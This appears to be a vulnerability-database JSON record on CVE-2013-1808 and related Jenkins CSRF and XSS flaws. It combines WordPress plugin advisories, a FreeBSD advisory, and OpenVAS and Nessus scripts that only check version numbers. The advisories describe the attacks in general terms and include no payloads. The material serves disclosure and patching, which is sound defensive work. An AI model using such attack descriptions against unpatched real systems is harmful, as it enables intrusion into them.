"published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6754", "href": "https://wpvulndb.com/vulnerabilities/6754", "type": "wpvulndb", "title": "q2w3-inc-manager <= 2.3.1 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - buckets <= 0.1.9.2 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6757", "href": "https://wpvulndb.com/vulnerabilities/6757", "type": "wpvulndb", "title": "buckets <= 0.1.9.2 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:12", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - wppygments <= 0.3.2 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6747", "href": "https://wpvulndb.com/vulnerabilities/6747", "type": "wpvulndb", "title": "wppygments <= 0.3.2 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - paypal-digital-goods-monetization-powered-by-cleeng <= 2.2.13 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6764", "href": "https://wpvulndb.com/vulnerabilities/6764", "type": "wpvulndb", "title": "paypal-digital-goods-monetization-powered-by-cleeng <= 2.2.13 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - mobileview <= 1.0.7 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6765", "href": "https://wpvulndb.com/vulnerabilities/6765", "type": "wpvulndb", "title": "mobileview <= 1.0.7 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - java-trackback <= 0.2 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6758", "href": "https://wpvulndb.com/vulnerabilities/6758", "type": "wpvulndb", "title": "java-trackback <= 0.2 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - tiny-url <= 1.3.2 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6762", "href": "https://wpvulndb.com/vulnerabilities/6762", "type": "wpvulndb", "title": "tiny-url <= 1.3.2 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:13", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - coupon-code-plugin <= 2.1 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6753", "href": "https://wpvulndb.com/vulnerabilities/6753", "type": "wpvulndb", "title": "coupon-code-plugin <= 2.1 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:17", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - wp-link-to-us <= 2.0 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6756", "href": "https://wpvulndb.com/vulnerabilities/6756", "type": "wpvulndb", "title": "wp-link-to-us <= 2.0 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-06-29T19:23:14", "bulletinFamily": "software", "cvelist": ["CVE-2013-1808"], "description": "WordPress Vulnerability - WP Clone by WP Academy <= 2.1.1 - XSS in ZeroClipboard\n", "modified": "2019-10-21T00:00:00", "published": "2014-08-01T00:00:00", "id": "WPVDB-ID:6761", "href": "https://wpvulndb.com/vulnerabilities/6761", "type": "wpvulndb", "title": "WP Clone by WP Academy <= 2.1.1 - XSS in ZeroClipboard", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "\nJenkins Security Advisory reports:\n\nThis advisory announces multiple security vulnerabilities that\n\t were found in Jenkins core.\n\n\nSECURITY-63 / CVE-2013-2034\nThis creates a cross-site request forgery (CSRF) vulnerability\n\t\t on Jenkins master, where an anonymous attacker can trick an\n\t\t administrator to execute arbitrary code on Jenkins master by\n\t\t having him open a specifically crafted attack URL.\nThere's also a related vulnerability where the permission\n\t\t check on this ability is done imprecisely, which may affect\n\t\t those who are running Jenkins instances with a custom\n\t\t authorization strategy plugin.\n\n\nSECURITY-67 / CVE-2013-2033\nThis creates a cross-site scripting (XSS) vulnerability, where\n\t\t an attacker with a valid user account on Jenkins can execute\n\t\t JavaScript in the browser of other users, if those users are\n\t\t using certain browsers.\n\n\nSECURITY-69 / CVE-2013-2034\nThis is another CSRF vulnerability that allows an attacker to\n\t\t cause a deployment of binaries to Maven repositories. This\n\t\t vulnerability has the same CVE ID as SEUCRITY-63.\n\n\nSECURITY-71 / CVE-2013-1808\nThis creates a cross-site scripting (XSS) vulnerability.\n\n\n\n", "edition": 4, "modified": "2013-05-02T00:00:00", "published": "2013-05-02T00:00:00", "id": "622E14B1-B40C-11E2-8441-00E0814CAB4E", "href": "https://vuxml.freebsd.org/freebsd/622e14b1-b40c-11e2-8441-00e0814cab4e.html", "title": "jenkins -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-18T15:24:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2016-07-14T00:00:00", "id": "OPENVAS:1361412562310807348", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807348", "type": "openvas", "title": "Jenkins CSRF And XSS Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CSRF And XSS Vulnerabilities (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807348\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2013-2034\", \"CVE-2013-2033\", \"CVE-2013-1808\");\n script_bugtraq_id(59631, 59634, 58257);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 13:00:47 +0530 (Thu, 14 Jul 2016)\");\n\n script_name(\"Jenkins CSRF And XSS Vulnerabilities (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A cross-site request forgery (CSRF) flaw in the Jenkins master, where an\n anonymous attacker can trick an administrator to execute arbitrary code on\n Jenkins master by having him open a specifically crafted attack URL.\n\n - The multiple input validation errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on Jenkins master by having him open a\n specifically crafted attack URL and to execute JavaScript in the browser of other users.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line prior to 1.514, Jenkins LTS prior to 1.509.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.514,\n Jenkins LTS users should update to 1.509.1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2013-05-02/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"1.509.1\" ) ) {\n vuln = TRUE;\n fix = \"1.509.1\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"1.514\" ) ) {\n vuln = TRUE;\n fix = \"1.514\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "description": "This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.", "modified": "2019-10-17T00:00:00", "published": "2016-07-14T00:00:00", "id": "OPENVAS:1361412562310807349", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807349", "type": "openvas", "title": "Jenkins CSRF And XSS Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CSRF And XSS Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807349\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2013-2034\", \"CVE-2013-2033\", \"CVE-2013-1808\");\n script_bugtraq_id(59631, 59634, 58257);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-14 13:00:47 +0530 (Thu, 14 Jul 2016)\");\n\n script_name(\"Jenkins CSRF And XSS Vulnerabilities (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is\n prone to cross-site request forgery and cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A cross-site request forgery (CSRF) flaw in the Jenkins master, where an\n anonymous attacker can trick an administrator to execute arbitrary code on\n Jenkins master by having him open a specifically crafted attack URL.\n\n - The multiple input validation errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code on Jenkins master by having him open a\n specifically crafted attack URL and to execute JavaScript in the browser of other users.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line prior to 1.514, Jenkins LTS prior to 1.509.1.\");\n\n script_tag(name:\"solution\", value:\"Jenkins main line users should update to 1.514,\n Jenkins LTS users should update to 1.509.1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2013-05-02/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"1.509.1\" ) ) {\n vuln = TRUE;\n fix = \"1.509.1\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"1.514\" ) ) {\n vuln = TRUE;\n fix = \"1.514\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T03:19:11", "description": "The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is affected by multiple vulnerabilities :\n\n - The included component 'ZeroClipboard' contains an\n error in the file 'ZeroClipboard10.swf' that could\n allow cross-site scripting attacks.\n (CVE-2013-1808)\n\n - An unspecified cross-site scripting error exists.\n (CVE-2013-2033)\n\n - Multiple errors exist that could lead to cross-site\n request forgery attacks, thus allowing an attacker to\n trick an administrator into executing arbitrary code.\n (CVE-2013-2034)", "edition": 26, "published": "2013-06-14T00:00:00", "title": "Jenkins < 1.514 / 1.509.1 and Jenkins Enterprise 1.466.x / 1.480.x < 1.466.14.1 / 1.480.4.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:cloudbees:jenkins"], "id": "JENKINS_1_514.NASL", "href": "https://www.tenable.com/plugins/nessus/66898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66898);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\"CVE-2013-1808\", \"CVE-2013-2033\", \"CVE-2013-2034\");\n script_bugtraq_id(58257, 59631, 59634);\n\n script_name(english:\"Jenkins < 1.514 / 1.509.1 and Jenkins Enterprise 1.466.x / 1.480.x < 1.466.14.1 / 1.480.4.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Jenkins version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a job scheduling / management system that\nis affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is affected by multiple vulnerabilities :\n\n - The included component 'ZeroClipboard' contains an\n error in the file 'ZeroClipboard10.swf' that could\n allow cross-site scripting attacks.\n (CVE-2013-1808)\n\n - An unspecified cross-site scripting error exists.\n (CVE-2013-2033)\n\n - Multiple errors exist that could lead to cross-site\n request forgery attacks, thus allowing an attacker to\n trick an administrator into executing arbitrary code.\n (CVE-2013-2034)\");\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-05-02\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?832b8cbc\");\n # https://www.cloudbees.com/jenkins-security-advisory-2013-05-02\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13462b17\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jenkins 1.514 / 1.509.1, Jenkins Enterprise 1.466.14.1 /\n1.480.4.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2034\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\n\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\n\n# Check if install is Enterprise\nenterprise_installed = get_kb_item(\"www/Jenkins/\"+port+\"/enterprise/Installed\");\nif (!isnull(enterprise_installed)) appname = \"Jenkins Enterprise by CloudBees\";\nelse appname = \"Jenkins Open Source\";\n\nurl = build_url(qs:'/', port:port);\n\nversion = get_kb_item_or_exit(\"www/Jenkins/\"+port+\"/JenkinsVersion\");\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (report_paranoia < 2 && isnull(enterprise_installed)) audit(AUDIT_PARANOID);\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\nif (max_index(ver) < 2) exit(0, \"The version information of the \"+appname+\" install at \"+url+\" is not granular enough.\");\n\nif (\n report_paranoia > 1 && isnull(enterprise_installed) &&\n (\n ver_compare(ver:version, fix:'1.509.1', strict:FALSE) < 0 || # LTS version\n (\n ver[0] == 1 && ver[1] > 509 && ver[1] < 514 && # flag vulnerable major version releases,\n max_index(ver) < 3 # but not future LTS releases\n )\n )\n)\n{\n vuln = TRUE;\n fixed = \"1.514 / 1.509.1\";\n}\n\n# Check Enterprise ranges\nif (\n enterprise_installed &&\n (\n # All previous\n (ver[0] < 1 || (ver[0] == 1 && ver[1] < 466))\n ||\n # 1.466.x < 1.466.14.1\n (ver[0] == 1 && ver[1] == 466 && (ver[2] < 14 || (ver[2] == 14 && ver[3] < 1)))\n ||\n # 1.480.x < 1.480.4.1\n (ver[0] == 1 && ver[1] == 480 && (ver[2] < 4 || (ver[2] == 4 && ver[3] < 1)))\n )\n)\n{\n vuln = TRUE;\n fixed = \"1.466.14.1 / 1.480.4.1\";\n}\n\nif (vuln)\n{\n set_kb_item(name:\"www/\"+port+\"/XSRF\", value:TRUE);\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:52", "description": "Jenkins Security Advisory reports :\n\nThis advisory announces multiple security vulnerabilities that were\nfound in Jenkins core.\n\n- SECURITY-63 / CVE-2013-2034\n\nThis creates a cross-site request forgery (CSRF) vulnerability on\nJenkins master, where an anonymous attacker can trick an administrator\nto execute arbitrary code on Jenkins master by having him open a\nspecifically crafted attack URL.\n\nThere's also a related vulnerability where the permission check on\nthis ability is done imprecisely, which may affect those who are\nrunning Jenkins instances with a custom authorization strategy plugin.\n\n- SECURITY-67 / CVE-2013-2033\n\nThis creates a cross-site scripting (XSS) vulnerability, where an\nattacker with a valid user account on Jenkins can execute JavaScript\nin the browser of other users, if those users are using certain\nbrowsers.\n\n- SECURITY-69 / CVE-2013-2034\n\nThis is another CSRF vulnerability that allows an attacker to cause a\ndeployment of binaries to Maven repositories. This vulnerability has\nthe same CVE ID as SEUCRITY-63.\n\n- SECURITY-71 / CVE-2013-1808\n\nThis creates a cross-site scripting (XSS) vulnerability.", "edition": 22, "published": "2013-05-04T00:00:00", "title": "FreeBSD : jenkins -- multiple vulnerabilities (622e14b1-b40c-11e2-8441-00e0814cab4e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2034", "CVE-2013-2033", "CVE-2013-1808"], "modified": "2013-05-04T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:jenkins"], "id": "FREEBSD_PKG_622E14B1B40C11E2844100E0814CAB4E.NASL", "href": "https://www.tenable.com/plugins/nessus/66311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66311);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-1808\", \"CVE-2013-2033\", \"CVE-2013-2034\");\n\n script_name(english:\"FreeBSD : jenkins -- multiple vulnerabilities (622e14b1-b40c-11e2-8441-00e0814cab4e)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory reports :\n\nThis advisory announces multiple security vulnerabilities that were\nfound in Jenkins core.\n\n- SECURITY-63 / CVE-2013-2034\n\nThis creates a cross-site request forgery (CSRF) vulnerability on\nJenkins master, where an anonymous attacker can trick an administrator\nto execute arbitrary code on Jenkins master by having him open a\nspecifically crafted attack URL.\n\nThere's also a related vulnerability where the permission check on\nthis ability is done imprecisely, which may affect those who are\nrunning Jenkins instances with a custom authorization strategy plugin.\n\n- SECURITY-67 / CVE-2013-2033\n\nThis creates a cross-site scripting (XSS) vulnerability, where an\nattacker with a valid user account on Jenkins can execute JavaScript\nin the browser of other users, if those users are using certain\nbrowsers.\n\n- SECURITY-69 / CVE-2013-2034\n\nThis is another CSRF vulnerability that allows an attacker to cause a\ndeployment of binaries to Maven repositories. This vulnerability has\nthe same CVE ID as SEUCRITY-63.\n\n- SECURITY-71 / CVE-2013-1808\n\nThis creates a cross-site scripting (XSS) vulnerability.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-05-02\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?832b8cbc\"\n );\n # https://vuxml.freebsd.org/freebsd/622e14b1-b40c-11e2-8441-00e0814cab4e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65f6b23a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<1.514\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
